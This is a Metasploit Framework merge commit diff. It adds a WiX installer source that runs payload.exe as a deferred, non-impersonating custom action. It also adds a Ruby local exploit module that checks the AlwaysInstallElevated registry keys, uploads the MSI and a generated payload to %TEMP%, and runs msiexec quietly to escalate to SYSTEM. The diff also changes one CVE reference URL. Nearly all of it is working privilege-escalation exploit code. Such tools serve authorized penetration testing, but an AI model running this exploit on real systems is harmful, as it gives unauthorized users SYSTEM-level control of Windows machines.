Merge branch 'master' of github.com:rapid7/metasploit-framework
This commit is contained in:
commit
b2f906e83e
Binary file not shown.
|
@ -0,0 +1,29 @@
|
|||
<?xml version='1.0' encoding='windows-1252'?>
|
||||
<Wix xmlns='http://schemas.microsoft.com/wix/2006/wi'>
|
||||
<Product Name='Foobar 1.0' Id='*'
|
||||
Language='1033' Codepage='1252' Version='1.0.0' Manufacturer='Acme Ltd.'>
|
||||
|
||||
<Package InstallerVersion="100" Languages="0" Manufacturer="Acme Ltd." ReadOnly="no" />
|
||||
|
||||
<Media Id='1' Cabinet='product.cab' EmbedCab='yes' />
|
||||
|
||||
<Directory Id='TARGETDIR' Name='SourceDir'>
|
||||
<Component Id='MyComponent' Guid='12345678-1234-1234-1234-123456789012'>
|
||||
<Condition>0</Condition>
|
||||
</Component>
|
||||
</Directory>
|
||||
|
||||
<!-- Execute must be deferred and Impersonate no to run as a higher privilege level -->
|
||||
<CustomAction Id='ExecNotepad' Directory='TARGETDIR' Impersonate='no' Execute='deferred' ExeCommand='[SourceDir]payload.exe' Return='asyncNoWait'/>
|
||||
|
||||
<Feature Id='Complete' Level='1'>
|
||||
<ComponentRef Id='MyComponent' />
|
||||
</Feature>
|
||||
|
||||
<InstallExecuteSequence>
|
||||
<ResolveSource After="CostInitialize" />
|
||||
<Custom Action="ExecNotepad" After="InstallInitialize" />
|
||||
</InstallExecuteSequence>
|
||||
|
||||
</Product>
|
||||
</Wix>
|
|
@ -95,7 +95,7 @@ class Msf::Module::SiteReference < Msf::Module::Reference
|
|||
if (in_ctx_id == 'OSVDB')
|
||||
self.site = 'http://www.osvdb.org/' + in_ctx_val.to_s
|
||||
elsif (in_ctx_id == 'CVE')
|
||||
self.site = 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=' + in_ctx_val.to_s
|
||||
self.site = "http://cvedetails.com/cve/#{in_ctx_val.to_s}/"
|
||||
elsif (in_ctx_id == 'BID')
|
||||
self.site = 'http://www.securityfocus.com/bid/' + in_ctx_val.to_s
|
||||
elsif (in_ctx_id == 'MSB')
|
||||
|
|
|
@ -0,0 +1,178 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require 'msf/core/post/windows/registry'
|
||||
require 'msf/core/post/common'
|
||||
require 'msf/core/post/file'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = AverageRanking
|
||||
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Post::Common
|
||||
include Msf::Post::File
|
||||
include Msf::Post::Windows::Registry
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
'Name' => 'Windows AlwaysInstallElevated MSI',
|
||||
'Description' => %q{
|
||||
This module checks the AlwaysInstallElevated registry keys which dictate if
|
||||
.MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
|
||||
|
||||
The default MSI file is data/exploits/exec_payload.msi with the WiX source file
|
||||
under external/source/exploits/exec_payload_msi/exec_payload.wxs. This MSI simply
|
||||
executes payload.exe within the same folder.
|
||||
|
||||
The MSI may not execute succesfully successive times, but may be able to get around
|
||||
this by regenerating the MSI.
|
||||
|
||||
MSI can be rebuilt from the source using the WIX tool with the following commands:
|
||||
candle exec_payload.wxs
|
||||
light exec_payload.wixobj
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Ben Campbell',
|
||||
'Parvez Anwar' # discovery?/inspiration
|
||||
],
|
||||
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'WfsDelay' => 10,
|
||||
'EXITFUNC' => 'thread',
|
||||
'InitialAutoRunScript' => 'migrate -k -f'
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows', { } ],
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
|
||||
[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
|
||||
[ 'URL', 'http://wix.sourceforge.net'] ,
|
||||
],
|
||||
'DisclosureDate'=> 'Mar 18 2010',
|
||||
'DefaultTarget' => 0
|
||||
}))
|
||||
|
||||
register_advanced_options([
|
||||
OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
|
||||
OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def check
|
||||
install_elevated = "AlwaysInstallElevated"
|
||||
installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
|
||||
hkcu = "HKEY_CURRENT_USER\\#{installer}"
|
||||
hklm = "HKEY_LOCAL_MACHINE\\#{installer}"
|
||||
|
||||
local_machine_value = registry_getvaldata(hklm,install_elevated)
|
||||
|
||||
if local_machine_value.nil?
|
||||
print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
elsif local_machine_value == 0
|
||||
print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
else
|
||||
print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
|
||||
current_user_value = registry_getvaldata(hkcu,install_elevated)
|
||||
end
|
||||
|
||||
if current_user_value.nil?
|
||||
print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
elsif current_user_value == 0
|
||||
print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
|
||||
return Msf::Exploit::CheckCode::Safe
|
||||
else
|
||||
print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
|
||||
return Msf::Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
end
|
||||
|
||||
def cleanup
|
||||
if not @executed
|
||||
return
|
||||
end
|
||||
|
||||
begin
|
||||
print_status("Deleting MSI...")
|
||||
file_rm(@msi_destination)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
print_error(e.to_s)
|
||||
print_error("Failed to delete MSI #{@msi_destination}, manual cleanup may be required.")
|
||||
end
|
||||
|
||||
begin
|
||||
print_status("Deleting Payload...")
|
||||
file_rm(@payload_destination)
|
||||
rescue Rex::Post::Meterpreter::RequestError => e
|
||||
print_error(e.to_s)
|
||||
print_error("Failed to delete payload #{@payload_destination}, this is expected if the exploit is successful, manual cleanup may be required.")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
||||
if check != Msf::Exploit::CheckCode::Vulnerable
|
||||
@executed = false
|
||||
return
|
||||
end
|
||||
|
||||
@executed = true
|
||||
|
||||
msi_filename = "exec_payload.msi" # Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
|
||||
msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
|
||||
|
||||
# Upload MSI
|
||||
@msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip # expand_path in Windows Shell adds a newline and has to be stripped
|
||||
print_status("Uploading the MSI to #{@msi_destination} ...")
|
||||
|
||||
#upload_file - ::File.read doesn't appear to work in windows...
|
||||
source = File.open(msi_source, "rb"){|fd| fd.read(fd.stat.size) }
|
||||
write_file(@msi_destination, source)
|
||||
|
||||
# Upload payload
|
||||
payload = generate_payload_exe
|
||||
@payload_destination = expand_path("%TEMP%\\payload.exe").strip
|
||||
print_status("Uploading the Payload to #{@payload_destination} ...")
|
||||
write_file(@payload_destination, payload)
|
||||
|
||||
# Execute MSI
|
||||
print_status("Executing MSI...")
|
||||
|
||||
if datastore['LOG_FILE'].nil?
|
||||
logging = ""
|
||||
else
|
||||
logging = "/l* #{datastore['LOG_FILE']} "
|
||||
end
|
||||
|
||||
if datastore['QUIET']
|
||||
quiet = "/quiet "
|
||||
else
|
||||
quiet = ""
|
||||
end
|
||||
|
||||
cmd = "msiexec.exe #{logging}#{quiet}/package #{@msi_destination}"
|
||||
vprint_status("Executing: #{cmd}")
|
||||
begin
|
||||
result = cmd_exec(cmd)
|
||||
rescue Rex::TimeoutError
|
||||
vprint_status("Execution timed out.")
|
||||
end
|
||||
vprint_status("MSI command-line feedback: #{result}")
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue